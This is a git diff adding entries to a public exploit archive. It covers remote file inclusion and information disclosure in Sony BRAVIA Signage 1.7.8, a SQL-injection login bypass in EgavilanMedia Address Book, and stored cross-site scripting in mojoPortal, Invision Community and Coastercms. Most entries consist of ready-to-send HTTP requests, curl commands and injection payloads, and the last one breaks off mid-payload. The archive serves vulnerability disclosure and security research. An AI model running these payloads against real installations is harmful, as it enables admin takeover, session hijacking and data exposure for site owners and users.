diff --git a/exploits/hardware/webapps/49186.txt b/exploits/hardware/webapps/49186.txt new file mode 100644 index 000000000..651176bdb --- /dev/null +++ b/exploits/hardware/webapps/49186.txt @@ -0,0 +1,69 @@ +# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - Unauthenticated Remote File Inclusion +# Date: 20.09.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://pro-bravia.sony.net +# Version: 1.7.8 + +Sony BRAVIA Digital Signage 1.7.8 Unauthenticated Remote File Inclusion + + +Vendor: Sony Electronics Inc. +Product web page: https://pro-bravia.sony.net + https://pro-bravia.sony.net/resources/software/bravia-signage/ + https://pro.sony/ue_US/products/display-software +Affected version: <=1.7.8 + +Summary: Sony's BRAVIA Signage is an application to deliver +video and still images to Pro BRAVIAs and manage the information +via a network. Features include management of displays, power +schedule management, content playlists, scheduled delivery +management, content interrupt, and more. This cost-effective +digital signage management solution is ideal for presenting +attractive, informative visual content in retail spaces and +hotel reception areas, visitor attractions, educational and +corporate environments. + +Desc: BRAVIA digital signage is vulnerable to a remote file +inclusion (RFI) vulnerability by including arbitrary client-side +dynamic scripts (JavaScript, VBScript, HTML) when adding content +though the input URL material of type html. This allows hijacking +the current session of the user, execute cross-site scripting code +or changing the look of the page and content modification on current +display. + +Tested on: Microsoft Windows Server 2012 R2 + Ubuntu + NodeJS + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5612 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5612.php + + +20.09.2020 + +-- + + +Request: +-------- + +POST /api/content-creation?type=create&id=174ace2f9371b4 HTTP/1.1 +Host: 192.168.1.20:8080 +Proxy-Connection: keep-alive +Content-Length: 468 +Accept: application/json, text/plain, */* +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36 +Content-Type: application/json;charset=UTF-8 +Origin: http://192.168.1.20:8080 +Referer: http://192.168.1.20:8080/test.txt +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: io=RslVZVH6Dc8WsOn5AAAJ + +{"material":[{"name":"http://www.zeroscience.mk/pentest/XSS.svg","type":"html"},{"name":"C:\\fakepath\\Blank.jpg","type":"jpeg"},{"name":"","type":"external_input"},{"name":"","type":""}],"layout":{"name":"assets/images/c4e7e66e.icon_layout_pattern_landscape_003.png","area":3,"direction":"landscape","layouts":[{"index":1,"width":960,"height":1080,"x":0,"y":0},{"index":2,"width":960,"height":540,"x":960,"y":0},{"index":3,"width":960,"height":540,"x":960,"y":540}]}} \ No newline at end of file diff --git a/exploits/hardware/webapps/49187.txt b/exploits/hardware/webapps/49187.txt new file mode 100644 index 000000000..91cb0f96b --- /dev/null +++ b/exploits/hardware/webapps/49187.txt @@ -0,0 +1,52 @@ +# Exploit Title: Sony BRAVIA Digital Signage 1.7.8 - System API Information Disclosure +# Date: 20.09.2020 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://pro-bravia.sony.net +# Version: 1.7.8 + +Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure + + +Vendor: Sony Electronics Inc. +Product web page: https://pro-bravia.sony.net + https://pro-bravia.sony.net/resources/software/bravia-signage/ + https://pro.sony/ue_US/products/display-software +Affected version: <=1.7.8 + +Summary: Sony's BRAVIA Signage is an application to deliver +video and still images to Pro BRAVIAs and manage the information +via a network. Features include management of displays, power +schedule management, content playlists, scheduled delivery +management, content interrupt, and more. This cost-effective +digital signage management solution is ideal for presenting +attractive, informative visual content in retail spaces and +hotel reception areas, visitor attractions, educational and +corporate environments. + +Desc: The application is vulnerable to sensitive information +disclosure vulnerability. An unauthenticated attacker can +visit several API endpoints and disclose information running +on the device. + +Tested on: Microsoft Windows Server 2012 R2 + Ubuntu + NodeJS + Express + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2020-5610 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php + + +20.09.2020 + +-- + + +$ curl http://192.168.1.20:8080/api/system + +{"__v":0,"_id":"5fa1d6ed9446da0b002d678f","version":"1.7.8","contentsServer":{"url":"http://192.168.1.21/joxy/"},"networkInterfaces":{"lo":[{"address":"127.0.0.1","netmask":"255.0.0.0","family":"IPv4","mac":"00:00:00:00:00:00","internal":true}],"eth0":[{"address":"192.168.1.20","netmask":"255.255.255.0","family":"IPv4","mac":"ZE:R0:SC:13:NC:30","internal":false}]},"serverTime":"2020-12-01T20:13:41.069+01:00","os":"Synology","hostIp":"192.168.1.21"} \ No newline at end of file diff --git a/exploits/multiple/webapps/49182.txt b/exploits/multiple/webapps/49182.txt new file mode 100644 index 000000000..c82f2cb0b --- /dev/null +++ b/exploits/multiple/webapps/49182.txt @@ -0,0 +1,20 @@ +# Exploit Title: EgavilanMedia Address Book 1.0 Exploit - SQLi Auth Bypass +# Date: 02-12-2020 +# Exploit Author: Mayur Parmar(th3cyb3rc0p) +# Vendor Homepage: http://egavilanmedia.com +# Software Link : http://egavilanmedia.com/egm-address-book/ +# Version: 1.0 +# Tested on: PopOS + +Attack Vector: +An attacker can gain admin panel access using malicious sql injection queries. + +Steps to reproduce: +1. Open admin login page using following URl: +-> http://localhost/Address%20Book/login.php + +2. Now put below Payload in both the fields( User ID & Password) +Payload: admin' or '1'='1 + +3. Server accepted our payload and we bypassed cpanel without any +credentials \ No newline at end of file diff --git a/exploits/multiple/webapps/49184.txt b/exploits/multiple/webapps/49184.txt new file mode 100644 index 000000000..4ec2ea96b --- /dev/null +++ b/exploits/multiple/webapps/49184.txt @@ -0,0 +1,42 @@ +# Exploit Title: mojoPortal forums 2.7.0.0 - 'Title' Persistent Cross-Site Scripting +# Date: 3-12-2020 +# Exploit Author: Sagar Banwa +# Vendor Homepage: https://mojoportal.com +# Software Link: https://www.mojoportal.com/download +# Version: 2.7.0.0 +# Tested on: Windows 10/Kali Linux + +Attack vector: +This vulnerability can results attacker to inject the XSS payload in Add Forum title section and each time admin visits the View Detail of Forum section from admin panel, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. + +Vulnerable Parameters: Edit Forum 'Title :'. + +Steps-To-Reproduce: +1. Login to the Admin Account +2. Go to the Forums. +3. click on Add Forum. +4. Add payload to Title: +5. Click on Create New Forum. +6. As soon as admin or any visitor visit the forum the XSS payload will triage. + + +Post Request - +''' + +POST /Forums/EditForum.aspx?mid=1275&pageid=756 HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: https://localhost/Forums/EditForum.aspx?mid=1275&pageid=756 +Content-Type: application/x-www-form-urlencoded +Content-Length: 5037 +Origin: https://localhost +Connection: close +Cookie: ASP.NET_SessionId=[removed]; _ga=GA1.2.1772464100.1606932969; _gid=GA1.2.1379348562.1606932969; returnurl25=https://localhost/; .mojochangeme=7ECC859CF4455C5CAE01964464A1029D676213BFF565B38E31D6AE3CF45C212B26FEF4451D2565510EFC1FBEE1A0002322CB05C272CFF74A5F2BDD798286542EA2BC30A889ABDC6D74502865A66DECF250F715A55C510F2DFDBCA1865D3DF436DA579221; localhostportalroles25=3119B16DC158DE7032105189AE61DB79F7043A498D422DABE9485B15E18E299E5C3B1C0696B736560172F2435276EF79EBF5D93A714F285B6EAEB16B648CB2EA4C7AE691B25D00EF4AD168393EFB423ED302A355C340B5D11AA9C7F44BDA6767678C3212BAA3B2991B38D1971836A62C0A1E2EF7AA36FE5DFE1BDAFF077F785F74B360520BA5793271671755790ED2BB9E98199A; fwAdminDrawer=close; _gat=1 +Upgrade-Insecure-Requests: 1 + +__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATEFIELDCOUNT=7&__VIEWSTATE=8GbpJWPoYrikzpEsM5g5Oyxg%2Fw3otQN%2Bp%2FxL2%2BIM8Cb0gFtj%2BUt4LWZm2SnDpq2wFeoZ5CxcLmEwnfTYfX3zUCO8ullGYZmsvrRPgkCmd4Q8Ziuu9bC6xpnpvd3zY2u2%2FmkVsmTINB4RJfAFk%2FM2RGngO7YcBtMIdKm1B0Mca3Lzwk9SbGZ%2BrkzOKF%2FMw%2Fev0rDciq1cZ2EfgKa6cfHhN9Rdo1CK3u%2FaGhGTXDMq4kgcV8VmtKYzMd60hoYTtdj%2B6xVyW2kJ0W6uYuzNZy4ctGRethu2TDkK%2Bp3Jt69X2iL07JQmXYFL4Nouh%2FF5nR3dDnhT50x%2F7ezT%2BRKLpwnBPrqE2XRgsR9eCwyV59d6NIxNos6fD3rYmhRgONXeinpuRxe8AFElCPOnFXJz7nhtBNkUx9xl2jx95l6CS7wE8wQtFQc5PWUlJ7r1junVJ5oUmFhLEjDXn7qJ%2Fn9kBHDzTjYI7Epq%2Fo8uS9FRO0PeNyQLqUlRW5Ig&__VIEWSTATE1=xhUOYE%2FB05kVdGbeLy9qSX0k5X6mJ0pwbklHcDgNHAdlV6yKobnEZLVzA11ZLSVTDLlg1anxthz4S3MKQLjEcxWd8EbQ6TFFyuR4Ey6ZQlHXc4YXVzaRdBe8XPsfbZrh6fqBJab90XjGQZoAMeE3mDqXVKo7oeA5YpZn4bfBHNxj8el8vs%2B5QbAD5INtXMzVMLrtoNxHRlPjtn7u2LiRHXS7mal7GPJ2RD48rh1sEBkohr91gAxGBLdl3H3rT%2Fo1ACtQU8sNRceeV1XhgEbjPyweu6L2FPtyWxyQXma76osWfXkftyt3dloWIywM201r3ByGOAxR%2BtpFpj3IwIoyEJvvUnJ3UcteS6DiG2QqebBaVAl%2B4NzTAhMOg3%2FX%2Fa5%2BZC8lZ71yf8U5GF58DcCEI36PvnQOlKlKuO2CsO0iOTXf8UYirVNV%2F6qqgwru0P5HhCulGGM%2BTrUswOWEZYkMzoyjeRwt54PUOKaAllJrYBy4UwYjs7Ma&__VIEWSTATE2=ME%2FnWlF9Jj7LFvrQ3J6B24%2FZAdATYRBm7MuM%2FZQ%2B2ft4PF%2BONy1JWKH%2F46T%2BS9ni%2FjOnj8TN9ACNlJlfGkhfmhXBCBaLpf5o2h58ucOACihtCaSmjixiv%2B1SM7DKYp3l3SRp0DrHZWLy9bHZIV1qFNOyudHvIMHy8mYC5dlH5vvFVcDC%2BZeAbCbOeYVBLlnKXatlNf3x91urPZhemx35uzEied9Tk7w8W3o5W5W5a9vWLrBkEg4Mhm5IHx0qTn9LHLP5dNi6EQnM%2B%2FE1%2FRcJoZq1%2BkjhBOPGx1M7EVg%2BnXzJLy1%2BnXEf5D64P6pS8HdNtxQOtLgP4RC9YFWzkMhRI%2B9B71cPQfRHKAJCB3idIBtvQ7OhmArPbsq0pOvmfOF7c3dsy0NyY8KtVTlGaL1km5H1Q2SZdn1yMmnaeGlOgoioPM7fSZ8u%2BE%2BtQkvuPY5afsnt1H%2BUmGBGbiZZZR1%2BR%2FkvUANhzOHnLfuXcloItlRnvpKF0gIW&__VIEWSTATE3=VG3JlCj%2FguoAhsgsZxvtFo51ac%2FZob3zGU3iuvj56w2XljOxYhJ25EqC%2BaJjbgyCCSgF%2FIUQ8XIdHtIOBKvDhyv%2BWhlPdttXTOzBKk9EW6swSmZN9TNVL32jDq5suMPMrh9SsNj7b62O0ycjpCeVPRGfCThjWYxu0GwFiy%2Fnd65fr6BUCiaoTliKw%2Bvnh3IMw0CQSu5VdL0Y4h2R5hiomNKkcfqjFN%2BXtj9UrXNqOS13QZ9TP1NLf0Q2CXQ%2FjZvwSM9koJlEZ3Z2xfvOo4VXU92ONV%2FuBg3ugFTpw9NcEVnU5C5HDDQdQJpYqrUpRpIOaDru80pqBz90shkebGCRnbbeSAaZb%2FpcBsSNnmpftBSftR0nZYMX3VAAJaxjyehbtfLsmbHPuCdzyLOsqMPaFClG00yAR%2BbmuKIv2veSZ6GBGQjM14jrRoWgqZmF711tfCIfEDYErBz5%2BGC%2F4xz8gv44z%2BSF8VKk4s5dOCKZo1YZQ7yFqSYD&__VIEWSTATE4=z%2FvLRzX2nqqUfDd9UEeZG%2Bowmey7SmdvonndNsjZWX35cB4FiARHvWJhnHIoJEY2%2BJB6bFM8628%2B35cnidhq5iboc6dhqAo%2Fl9VbFfp4rxq%2BGh%2Bw%2Fu%2BNiyai3o6LWuy5cWxRnAMrlNhErHm86uVj1HTosQbBDhd0PU7yVTS2dEtfi3GggBfVDFn2eLh4sr6iSkN85RPhENouvNKl6PmHhhaFl4poe6etmjh63vYipPoY1VvYz2h%2BDisT5lEo7NYOhchYv%2FIQPuGkPBjkdTqtqourBuYw0pzLGRA1zf8X0UgwWnJVT8RLaf3Bp0uatXoatA%2FIo5j1Lggxm9cM2GFH7%2FrYDwAyPgWF%2BtLgqQUpnZoQoeIh62uPykr3p5pKsWXpKdtz4IINfyH%2BE0CH2gj96zVM76zFHdYt59%2Bs%2BZgu5i%2Bzf3icKJWlZaJiLzfEpSwIQijjvzC5CxwEAoO1LfnupW%2FZFWt%2FwsDXOZl2tgAunHfXe4sv4YHu&__VIEWSTATE5=8E0NZMBOC6vc%2Fm%2F%2FPv1X3U9D8PHM%2F60zTW2Fgz%2FDdau3xuxrxCd6EkTpHliKnJld0hjuEnMan6KZGs3sy59qTLc%2FOAU5Y%2Bg4FtWPugB%2B8faI4wtWGpLlR%2F2%2FhVyIer702HqYaZe2YtmG3FzYsEP5iNdWBIVAHG%2B285uMPcrARf7t7RNbnVLYe2hR4g6rm%2B3cz7Xlvl0hW1gtdYBLtD4x8eGpNWXsrZEdc9jjsRgDfd12VsDVZeIYxA5llNAQYyLLcv1czlYtLC2rT2cay3LZ3bCz5KvNOiNQNc4PjL5bXBFGlz9BCztmCHaxWXkhytsFQJOND2HqK6ZcBSsXFur9XKjdhkVbLJUGY6hd9zlqurehbzaS9qJFe2g1DTCuJeN39qqcjJk3ev3TOQbu9Q2RX2VEFF8Mdd8WFRdaJ7JJN5kzkmVgtcjmrhHZjpsZEGVYmL0A3HbXukjVBb8kHoOA1MzUagoa6kwmCNfNCmGgbKKZVSm90HF5&__VIEWSTATE6=O%2BS12LR2Z4oVhKLtpr07dZf4n4xaCnf%2BvWZpBROiixTdpBGO4Eg3J%2B2UqaWIrBm2FJjY%2B2NAG6EiGHDpYEzCuBEHQQg3RzT0co%2F0MXY0Vp%2FvhG5voMgkx24Zixl3Z2RcJ7GFNDyF2hDwZmEhmR8d5Xeh%2FlkLsGc4vHL7SAXLwg5lSPgLb8wTEPDv2WkOChlXK%2BKAUm5v6N4o3dv9j9fztlHsS%2FFXHM1HvYfH%2BX5UPFAfvCkiiK6iXbrQsvVRVX9KBvWmMdBLC4FHSX8BO6qy2U8d2TaJIG2YfewgUHkGWMEvhqFqsTyetatA&__VIEWSTATEGENERATOR=28F0A2BA&__EVENTVALIDATION=MhCP0%2FosgOAGG9hof6m2uvCclDI3J3ur9418exWCyHZn20PSWqlYEBB584LM%2Fwt7LEIk5phX%2F%2FnqL9ZAiCGAwuqvm%2FS9%2FjvzaXlbQf9H0qlhD30h7hKVA1zy%2FQB1rQh8Nbmh3tjczNLrHj%2BY%2FlybGM%2BEyN%2BelhoN8Q%2FOykCziCKgbY9tDeDf4S%2FWsjzOoEGyOpijMEyEq0ikBrY26gO4X0GeiV6Yw6LvTHt5PL%2FNElgUT%2BCw%2B0loxrz5QgIKuKqozFkU08iSXgsVrNJKUFD%2FJaUPeaDRiNUjYsMQq5qXop%2F1%2B3lUT1XDP1MelFUveIeo4AxsnA%2FhoiB48O69ScQY0J6WTvQo%2B%2FpY6Cn4Din2x5QvSigzwCJtqI3F%2BSWxlZzYSeJCq1uQlw2lboNaJhOoDSDTUG3cO3Oy18WG6PHcKbZHgq%2BPDJq6RvXq50a9Z36J4lnFpQmRofOaSpXR7e0uoBo6VYatMOcu3uWC6WKq6%2F8I0G88OKDIXdU8mQyTr%2B4IfZ2tAwNkfhQQyOOPOQKjJOPGOYnH14ozP58d7PNrMbUQKCwyimsUbox5uLQclzM5wK4x1mV9FqA9PZOy1Q9ApKyLotkAJbTdVmBkDQ1ZKOUd9GOBgg%2BAOuVokVGF8qCF4NYZjBZjpfW0OmihSu%2BXiONqPoa6K5483r8tF0%2F5Hch2K4XggkPqA%2B%2FVmfHr%2BkwKb7RUbQ%3D%3D&ctl00%24mainContent%24txtTitle=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&ctl00%24mainContent%24edContentinnerEditor=&ctl00%24mainContent%24txtSortOrder=100&ctl00%24mainContent%24txtPostsPerPage=10&ctl00%24mainContent%24txtThreadsPerPage=40&ctl00%24mainContent%24allowedPostRoles%24ctl00%242=Authenticated+Users&ctl00%24mainContent%24txtModeratorNotifyEmail=&ctl00%24mainContent%24chkIncludeInGoogleMap=on&ctl00%24mainContent%24btnUpdate=Create+New+Forum&ctl00%24mainContent%24hdnReturnUrl=https%3A%2F%2Flocalhost%2Fforums + +''' \ No newline at end of file diff --git a/exploits/multiple/webapps/49188.txt b/exploits/multiple/webapps/49188.txt new file mode 100644 index 000000000..198aa9c9d --- /dev/null +++ b/exploits/multiple/webapps/49188.txt @@ -0,0 +1,39 @@ +# Exploit Title: Invision Community 4.5.4 - 'Field Name' Stored Cross-Site Scripting +# Date: 02-12-2020 +# Exploit Author: Hemant Patidar (HemantSolo) +# Vendor Homepage: https://invisioncommunity.com/ +# Software Link: https://invisioncommunity.com/buy +# Version: 4.5.4 +# Tested on: Windows 10/Kali Linux + +Vulnerable Parameters: Profile - Field Name. + +Steps-To-Reproduce: +1. Go to the Invision Community admin page. +2. Now go to the Members - MEMBER SETTINGS - Profiles. +3. Now click on Add Profile field. +4. Put the below payload in Field Name: +"" +5. Now click on Save button. +6. The XSS will be triggered. + + +POST /admin/?app=core&module=membersettings&controller=profiles&tab=profilefields&subnode=1&do=form&parent=3&ajaxValidate=1 HTTP/1.1 +Host: 127.0.0.1 +Connection: close +Content-Length: 660 +Accept: */* +DNT: 1 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: https://127.0.0.1 +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://127.0.0.1/admin/?app=core&module=membersettings&controller=profiles +Accept-Encoding: gzip, deflate +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6 +Cookie: XYZ + +form_new_activeTab=&form_new_submitted=1&csrfKey=3ffc7a5774ddc0d2a7142d2072191efc&MAX_FILE_SIZE=20971520&pf_title%5B1%5D=%3Cscript%3Ealert(123)%3C%2Fscript%3E&pf_desc%5B1%5D=Test&pf_group_id=3&pf_type=Text&pf_allow_attachments=0&pf_allow_attachments_checkbox=1&pf_content%5B0%5D=&pf_multiple=0&pf_max_input=0&pf_input_format=&pf_member_edit=0&pf_member_edit_checkbox=1&radio_pf_member_hide__empty=1&pf_member_hide=all&radio_pf_topic_hide__empty=1&pf_topic_hide=hide&pf_search_type=loose&pf_search_type_on_off=exact&radio_pf_profile_format__empty=1&pf_profile_format=default&pf_profile_format_custom=&radio_pf_format__empty=1&pf_format=default&pf_format_custom= \ No newline at end of file diff --git a/exploits/php/webapps/49137.txt b/exploits/php/webapps/49137.txt index 1fa8e7bcd..94857d566 100644 --- a/exploits/php/webapps/49137.txt +++ b/exploits/php/webapps/49137.txt @@ -5,6 +5,7 @@ # Software Link: https://lepton-cms.org/english/download/archive.php # Version: 4.7.0 # Tested on: Windows 10/Kali Linux +# CVE: CVE-2020-29240 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser. diff --git a/exploits/php/webapps/49181.txt b/exploits/php/webapps/49181.txt new file mode 100644 index 000000000..70d02200e --- /dev/null +++ b/exploits/php/webapps/49181.txt @@ -0,0 +1,23 @@ +# Exploit Title: Coastercms 5.8.18 - Stored XSS +# Exploit Author: Hardik Solanki +# Vendor Homepage: https://www.coastercms.org/ +# Software Link: https://www.coastercms.org/ +# Version: 5.8.18 +# Tested on Windows 10 + +XSS IMPACT: +1: Steal the cookie +2: User redirection to a malicious website + +Vulnerable Parameters: Edit Page tab + +Steps to reproduce: +1: Navigate to "http://localhost/admin/login" and log in with +admin credentials. +2:- Then after login navigates to "Page --> Homepage --> Our Blog" and +click on the edit page. +3: Then add the payload "" & Payload +"